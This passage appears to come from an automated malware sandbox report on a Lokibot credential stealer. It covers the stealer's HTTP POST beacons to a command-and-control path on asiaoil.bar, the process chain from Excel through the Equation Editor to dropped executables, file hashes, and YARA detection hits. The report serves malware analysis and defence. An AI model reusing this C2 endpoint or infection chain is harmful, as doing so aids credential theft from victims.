                    75 | 192.168.2.22 | 49241 | 104.21.49.244 | 80 | C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                    Timestamp | kBytes transferred | Direction | Data


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    76 | 192.168.2.22 | 49242 | 104.21.49.244 | 80 | C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                    Timestamp | kBytes transferred | Direction | Data


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    77 | 192.168.2.22 | 49243 | 172.67.197.66 | 80 | C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                    Timestamp | kBytes transferred | Direction | Data


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    78 | 192.168.2.22 | 49244 | 172.67.197.66 | 80 | C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                    Timestamp | kBytes transferred | Direction | Data


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    79 | 192.168.2.22 | 49245 | 172.67.197.66 | 80 | C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                    Timestamp | kBytes transferred | Direction | Data


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    8 | 192.168.2.22 | 49173 | 172.67.197.66 | 80 | C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Feb 10, 2022 10:22:09.274962902 CET | 325 | OUT | POST //bobby/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: asiaoil.bar
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 579BFA72
                    Content-Length: 149
                    Connection: close
                    Feb 10, 2022 10:22:09.407815933 CET | 326 | IN | HTTP/1.1 404 Not Found
                    Date: Thu, 10 Feb 2022 09:22:09 GMT
                    Content-Type: text/html; charset=UTF-8
                    Connection: close
                    Status: 404 Not Found
                    CF-Cache-Status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=9Es%2BCG1ikpvgB48TpSGLWbDWE4lq9KcFNWoR2DepgSQQlwCDx1lJRGNxwRi%2Fuixs5%2FkJ%2BkDAOwOExmpgG%2BFmlHRat148sW8J8clBcEhbV%2BEh21BpaPsALJP5WpoKTA%3D%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 6db4457809ea6939-FRA
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    80 | 192.168.2.22 | 49246 | 172.67.197.66 | 80 | C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                    Timestamp | kBytes transferred | Direction | Data


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    81 | 192.168.2.22 | 49247 | 172.67.197.66 | 80 | C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                    Timestamp | kBytes transferred | Direction | Data


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    9 | 192.168.2.22 | 49174 | 104.21.49.244 | 80 | C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Feb 10, 2022 10:22:10.415911913 CET | 326 | OUT | POST //bobby/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: asiaoil.bar
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 579BFA72
                    Content-Length: 149
                    Connection: close
                    Feb 10, 2022 10:22:10.503607035 CET | 327 | IN | HTTP/1.1 404 Not Found
                    Date: Thu, 10 Feb 2022 09:22:10 GMT
                    Content-Type: text/html; charset=UTF-8
                    Connection: close
                    Status: 404 Not Found
                    CF-Cache-Status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=v1xV1eUCMr1RHqWt4LM%2Fv%2BEUgUSXOzGnZmG6dttvsqUD60K11ymXFrl4lyksF6Q7oS%2BhJuNDPXKkgp1NVPUepBFUa%2B45veh4yiZTSSeqWs9tYXq72%2F%2FEXVVMkf5Q8g%3D%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 6db4457f29af917d-FRA
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.



                    Target ID:0
                    Start time:10:21:15
                    Start date:10/02/2022
                    Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    Wow64 process (32bit):false
                    Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                    Imagebase:0x13f770000
                    File size:28253536 bytes
                    MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high

                    Target ID:2
                    Start time:10:21:38
                    Start date:10/02/2022
                    Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                    Wow64 process (32bit):true
                    Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                    Imagebase:0x400000
                    File size:543304 bytes
                    MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high

                    Target ID:4
                    Start time:10:21:40
                    Start date:10/02/2022
                    Path:C:\Users\Public\vbc.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Users\Public\vbc.exe"
                    Imagebase:0x400000
                    File size:295124 bytes
                    MD5 hash:7DF1896047D9647D818080DD17563D92
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Antivirus matches:
                    • Detection: 100%, Joe Sandbox ML
                    Reputation:low

                    Target ID:5
                    Start time:10:21:41
                    Start date:10/02/2022
                    Path:C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                    Wow64 process (32bit):true
                    Commandline:C:\Users\user\AppData\Local\Temp\xmtxpy.exe C:\Users\user\AppData\Local\Temp\npotbzd
                    Imagebase:0x8a0000
                    File size:125440 bytes
                    MD5 hash:1EACD504E4461F9EE286715997D8A9EE
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.464120998.0000000000130000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000005.00000002.464120998.0000000000130000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000005.00000002.464120998.0000000000130000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 00000005.00000002.464120998.0000000000130000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                    • Rule: Loki_1, Description: Loki Payload, Source: 00000005.00000002.464120998.0000000000130000.00000004.00000800.00020000.00000000.sdmp, Author: kevoreilly
                    • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000005.00000002.464120998.0000000000130000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                    Reputation:low

                    Target ID:6
                    Start time:10:21:41
                    Start date:10/02/2022
                    Path:C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                    Wow64 process (32bit):true
                    Commandline:C:\Users\user\AppData\Local\Temp\xmtxpy.exe C:\Users\user\AppData\Local\Temp\npotbzd
                    Imagebase:0x8a0000
                    File size:125440 bytes
                    MD5 hash:1EACD504E4461F9EE286715997D8A9EE
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.669282613.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000006.00000002.669282613.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000006.00000002.669282613.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 00000006.00000002.669282613.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                    • Rule: Loki_1, Description: Loki Payload, Source: 00000006.00000002.669282613.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: kevoreilly
                    • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000006.00000002.669282613.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000000.460143750.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000006.00000000.460143750.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000006.00000000.460143750.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 00000006.00000000.460143750.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                    • Rule: Loki_1, Description: Loki Payload, Source: 00000006.00000000.460143750.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: kevoreilly
                    • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000006.00000000.460143750.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000000.461992324.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000006.00000000.461992324.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000006.00000000.461992324.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 00000006.00000000.461992324.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                    • Rule: Loki_1, Description: Loki Payload, Source: 00000006.00000000.461992324.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: kevoreilly
                    • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000006.00000000.461992324.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000000.463022626.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000006.00000000.463022626.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000006.00000000.463022626.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 00000006.00000000.463022626.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                    • Rule: Loki_1, Description: Loki Payload, Source: 00000006.00000000.463022626.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: kevoreilly
                    • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000006.00000000.463022626.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000000.460963189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000006.00000000.460963189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000006.00000000.460963189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 00000006.00000000.460963189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                    • Rule: Loki_1, Description: Loki Payload, Source: 00000006.00000000.460963189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: kevoreilly
                    • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000006.00000000.460963189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                    Reputation:low

                    No disassembly